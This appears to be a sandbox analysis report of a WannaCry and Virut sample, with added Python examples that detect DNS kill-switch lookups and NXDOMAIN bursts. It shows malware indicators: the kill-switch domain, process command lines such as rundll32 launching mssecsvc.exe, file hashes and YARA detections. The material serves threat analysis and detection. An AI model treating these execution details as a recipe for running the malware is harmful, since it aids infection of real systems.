                  Jul 20, 2022 19:41:37.572000980 CEST | 8.8.8.8 | 192.168.2.7 | 0x916e | Name error (3) | tdfkhn.com | none | none | A (IP address) | IN (0x0001)
                  Jul 20, 2022 19:41:37.602675915 CEST | 8.8.8.8 | 192.168.2.7 | 0xb711 | Name error (3) | izuupl.com | none | none | A (IP address) | IN (0x0001)
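The DNS answer table above carries two distinct signals: the kill-switch domain resolving (to sinkhole addresses) and, three minutes later, a run of NXDOMAIN replies for pseudo-random six-letter .com names from the same client. The following Python is an added triage example, not Joe Sandbox code. It parses a constructed, tab-separated rendering of rows taken from this table (plus one benign row for www.example.com, reserved by RFC 2606) and surfaces both signals; the window and threshold values are tuning assumptions, not figures from the report.

```python
"""Triage DNS answers for (a) a kill-switch domain lookup and (b) a burst of
NXDOMAIN replies for DGA-shaped names from one client.
Added example, not part of the sandbox report."""
import re
from collections import defaultdict
from datetime import datetime

RCODE_NXDOMAIN = 3

# Kill-switch domain observed in this report (sinkholed by Kryptos Logic).
KILL_SWITCH_DOMAINS = {"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"}

# Constructed sample (tab-separated): timestamp, resolver, client, txid, rcode, name, address.
SAMPLE_LOG = """\
Jul 20, 2022 19:38:14.126581907 CEST\t8.8.8.8\t192.168.2.7\t0xda4\tNo error (0)\twww.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\t104.16.173.80
Jul 20, 2022 19:38:20.000000000 CEST\t8.8.8.8\t192.168.2.7\t0x1001\tNo error (0)\twww.example.com\t192.0.2.1
Jul 20, 2022 19:41:08.202572107 CEST\t8.8.8.8\t192.168.2.7\t0x673c\tName error (3)\ttlmowf.com\tnone
Jul 20, 2022 19:41:08.301064968 CEST\t8.8.8.8\t192.168.2.7\t0xc0b2\tName error (3)\tlyeaew.com\tnone
Jul 20, 2022 19:41:08.374860048 CEST\t8.8.8.8\t192.168.2.7\t0xfc5\tName error (3)\tkqurib.com\tnone
Jul 20, 2022 19:41:09.083990097 CEST\t8.8.8.8\t192.168.2.7\t0x1d9e\tName error (3)\tpqjxkf.com\tnone
Jul 20, 2022 19:41:09.165765047 CEST\t8.8.8.8\t192.168.2.7\t0x2a89\tName error (3)\tomxsxm.com\tnone
Jul 20, 2022 19:41:09.199461937 CEST\t8.8.8.8\t192.168.2.7\t0xb170\tName error (3)\tyurwei.com\tnone
Jul 20, 2022 19:41:09.284782887 CEST\t8.8.8.8\t192.168.2.7\t0x1756\tName error (3)\tvpqnxj.com\tnone
Jul 20, 2022 19:41:09.324182034 CEST\t8.8.8.8\t192.168.2.7\t0x4ab9\tName error (3)\tcxfuoy.com\tnone
Jul 20, 2022 19:41:09.389641047 CEST\t8.8.8.8\t192.168.2.7\t0xbab8\tName error (3)\tiuwutz.com\tnone
Jul 20, 2022 19:41:09.483437061 CEST\t8.8.8.8\t192.168.2.7\t0xc036\tName error (3)\tiodilu.com\tnone
Jul 20, 2022 19:41:09.520129919 CEST\t8.8.8.8\t192.168.2.7\t0x477f\tName error (3)\teekkiz.com\tnone
Jul 20, 2022 19:41:09.595463991 CEST\t8.8.8.8\t192.168.2.7\t0x9878\tName error (3)\tasesdh.com\tnone
"""

# The report prints nanoseconds; strptime only accepts microseconds, so trim.
TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{6})\d*\s+\w+$")


def parse_timestamp(text):
    m = TS_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f")


def parse_rcode(text):
    """'Name error (3)' -> 3, 'No error (0)' -> 0."""
    return int(text[text.rindex("(") + 1:text.rindex(")")])


def parse_dns_log(text):
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, resolver, client, txid, rcode, name, address = line.split("\t")
        records.append({
            "ts": parse_timestamp(ts), "resolver": resolver, "client": client,
            "txid": int(txid, 16), "rcode": parse_rcode(rcode),
            "name": name.lower().rstrip("."),
            "address": None if address == "none" else address,
        })
    return records


# Shape of the names in this report: exactly six lowercase letters directly under .com.
DGA_LABEL_RE = re.compile(r"^[a-z]{6}$")


def looks_dga(name):
    labels = name.split(".")
    return len(labels) == 2 and labels[1] == "com" and bool(DGA_LABEL_RE.match(labels[0]))


def find_kill_switch_lookups(records):
    return [r for r in records if r["name"] in KILL_SWITCH_DOMAINS]


def find_nxdomain_bursts(records, window_seconds=10.0, threshold=8):
    """Per client, the densest run of DGA-shaped NXDOMAIN replies inside a sliding
    time window; at most one finding per client that crosses the threshold."""
    by_client = defaultdict(list)
    for r in records:
        if r["rcode"] == RCODE_NXDOMAIN and looks_dga(r["name"]):
            by_client[r["client"]].append(r)
    findings = []
    for client, hits in by_client.items():
        hits.sort(key=lambda r: r["ts"])
        best, start = None, 0
        for end in range(len(hits)):
            while (hits[end]["ts"] - hits[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best["count"]):
                best = {"client": client, "count": count,
                        "first": hits[start]["ts"], "last": hits[end]["ts"],
                        "names": [h["name"] for h in hits[start:end + 1]]}
        if best is not None:
            findings.append(best)
    return findings


if __name__ == "__main__":
    recs = parse_dns_log(SAMPLE_LOG)
    for r in find_kill_switch_lookups(recs):
        print(f"kill-switch lookup by {r['client']}: {r['name']} -> {r['address']}")
    for f in find_nxdomain_bursts(recs):
        span = (f["last"] - f["first"]).total_seconds()
        print(f"{f['client']}: {f['count']} NXDOMAIN for DGA-shaped names in {span:.2f}s, e.g. {f['names'][:3]}")
```

The kill-switch check is deliberately a plain set lookup: the point is that the name resolved at all (here to sinkhole addresses), not which address came back. The NXDOMAIN heuristic is keyed to the name shape seen in this report; for other families widen `DGA_LABEL_RE` or replace it with an entropy test, and expect to raise the threshold on busy resolvers.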
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.7 | 49722 | 104.16.173.80 | 80 | C:\Windows\mssecsvc.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jul 20, 2022 19:38:14.180756092 CEST | 0 | OUT | GET / HTTP/1.1
                  Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                  Cache-Control: no-cache
                  Jul 20, 2022 19:38:14.222408056 CEST | 1 | IN | HTTP/1.1 200 OK
                  Date: Wed, 20 Jul 2022 17:38:14 GMT
                  Content-Type: text/html
                  Content-Length: 607
                  Connection: close
                  Server: cloudflare
                  CF-RAY: 72dd7826abe95c14-FRA
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.7 | 49729 | 104.16.173.80 | 80 | C:\Windows\mssecsvc.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jul 20, 2022 19:40:36.366445065 CEST | 22 | OUT | GET / HTTP/1.1
                  Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                  Cache-Control: no-cache
                  Jul 20, 2022 19:40:36.404547930 CEST | 23 | IN | HTTP/1.1 200 OK
                  Date: Wed, 20 Jul 2022 17:40:36 GMT
                  Content-Type: text/html
                  Content-Length: 607
                  Connection: close
                  Server: cloudflare
                  CF-RAY: 72dd7b9f5ba1691b-FRA
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
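Both sessions are the same exchange: mssecsvc.exe sends a bare GET with a Host header for the kill-switch domain, and what answers is the Kryptos Logic sinkhole page, not attacker infrastructure. The Python below is an added example (not from the report) that classifies such an exchange from a captured request and response. REQUEST and RESPONSE are constructed from the headers and an abridged copy of the body shown above, with Content-Length computed from the embedded body so the length check is exercised honestly. The note in kill_switch_satisfied about WannaCry treating any successful fetch as its kill switch is background on the original sample, not something this report states.

```python
"""Classify an HTTP exchange as a WannaCry kill-switch probe answered by a sinkhole.
Added example, not part of the sandbox report."""
import re

KILL_SWITCH_HOSTS = {"www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"}

# Both markers appear in the response body captured in this report.
SINKHOLE_MARKERS = ("sinkholed by kryptos logic", "kryptoslogicsinkhole.com")

# Constructed and abridged from the captured body; not the full 607-byte page.
SINKHOLE_BODY = (
    '<!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8">'
    "<title>Sinkholed by Kryptos Logic</title>"
    '<link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/>'
    "</head><body><h1>Sinkholed!</h1><p>This domain has been sinkholed by "
    '<a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></body></html>'
)
REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    f"Content-Length: {len(SINKHOLE_BODY.encode('utf-8'))}\r\n"
    "Connection: close\r\n"
    "Server: cloudflare\r\n\r\n"
) + SINKHOLE_BODY

TITLE_RE = re.compile(r"<title>(.*?)</title>", re.IGNORECASE | re.DOTALL)


def parse_http_message(raw):
    """Split 'start line, headers, blank line, body'. Header names are lower-cased;
    repeated headers are not folded (not needed for this exchange)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def classify_session(request_raw, response_raw):
    req_line, req_hdrs, _ = parse_http_message(request_raw)
    method, path, _version = req_line.split(" ", 2)
    host = req_hdrs.get("host", "").lower()
    status_line, resp_hdrs, body = parse_http_message(response_raw)
    status = int(status_line.split(" ", 2)[1])
    declared = resp_hdrs.get("content-length")
    length_ok = declared is None or int(declared) == len(body.encode("utf-8"))
    title = TITLE_RE.search(body)
    lowered = body.lower()
    return {
        "method": method, "path": path, "host": host, "status": status,
        "server": resp_hdrs.get("server"),
        "title": title.group(1).strip() if title else None,
        "content_length_ok": length_ok,
        "is_kill_switch_host": host in KILL_SWITCH_HOSTS,
        "is_sinkholed": any(marker in lowered for marker in SINKHOLE_MARKERS),
    }


def kill_switch_satisfied(result):
    """Background on the original WannaCry sample (not from this report): the check
    is only whether the fetch succeeded, so any HTTP reply from the kill-switch
    host, a sinkhole's included, satisfies it."""
    return result["is_kill_switch_host"] and result["status"] is not None


if __name__ == "__main__":
    verdict = classify_session(REQUEST, RESPONSE)
    for key in ("host", "status", "server", "title", "content_length_ok",
                "is_kill_switch_host", "is_sinkholed"):
        print(f"{key}: {verdict[key]}")
    print("kill switch satisfied:", kill_switch_satisfied(verdict))
```

Matching on the sinkhole's own page text is what distinguishes "the domain is alive because a defender holds it" from "the domain is alive because an attacker registered it"; the Server header alone (cloudflare) says nothing either way.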



                  Target ID:0
                  Start time:19:38:04
                  Start date:20/07/2022
                  Path:C:\Windows\System32\loaddll32.exe
                  Wow64 process (32bit):true
                  Commandline:loaddll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll"
                  Imagebase:0x80000
                  File size:116736 bytes
                  MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:1
                  Start time:19:38:05
                  Start date:20/07/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1
                  Imagebase:0xdd0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:2
                  Start time:19:38:05
                  Start date:20/07/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\HFKDS6VcNO.dll,PlayGame
                  Imagebase:0xf90000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:3
                  Start time:19:38:05
                  Start date:20/07/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1
                  Imagebase:0xf90000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:4
                  Start time:19:38:07
                  Start date:20/07/2022
                  Path:C:\Windows\mssecsvc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\WINDOWS\mssecsvc.exe
                  Imagebase:0x400000
                  File size:3751936 bytes
                  MD5 hash:C69A376D234A2990509A077940306C82
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.382876162.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.385586477.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.384164421.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.383003497.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.384240153.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.381472054.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.385681867.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                  • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 90%, Virustotal
                  • Detection: 83%, Metadefender
                  • Detection: 98%, ReversingLabs
                  Reputation:low

                  Target ID:5
                  Start time:19:38:09
                  Start date:20/07/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",PlayGame
                  Imagebase:0xf90000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:6
                  Start time:19:38:09
                  Start date:20/07/2022
                  Path:C:\Windows\mssecsvc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\WINDOWS\mssecsvc.exe
                  Imagebase:0x400000
                  File size:3751936 bytes
                  MD5 hash:C69A376D234A2990509A077940306C82
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.388012447.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.385980083.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.390959066.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.392159166.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000000.388277654.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000000.392238630.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000000.386126124.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  Reputation:low

                  Target ID:7
                  Start time:19:38:11
                  Start date:20/07/2022
                  Path:C:\Windows\System32\winlogon.exe
                  Wow64 process (32bit):false
                  Commandline:winlogon.exe
                  Imagebase:0x7ff6d9470000
                  File size:677376 bytes
                  MD5 hash:F9017F2DC455AD373DF036F5817A8870
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000002.902197478.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.398152684.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000002.902600386.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.398121607.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.389559026.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:8
                  Start time:19:38:13
                  Start date:20/07/2022
                  Path:C:\Windows\System32\lsass.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\lsass.exe
                  Imagebase:0x7ff7d6b10000
                  File size:57976 bytes
                  MD5 hash:317340CD278A374BCEF6A30194557227
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000000.392885761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000002.902167065.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000002.902569116.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000000.400454619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000000.400467949.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  Target ID:9
                  Start time:19:38:14
                  Start date:20/07/2022
                  Path:C:\Windows\mssecsvc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\WINDOWS\mssecsvc.exe -m security
                  Imagebase:0x400000
                  File size:3751936 bytes
                  MD5 hash:C69A376D234A2990509A077940306C82
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.487557526.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000009.00000000.396243293.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000009.00000002.486435821.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.487502234.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
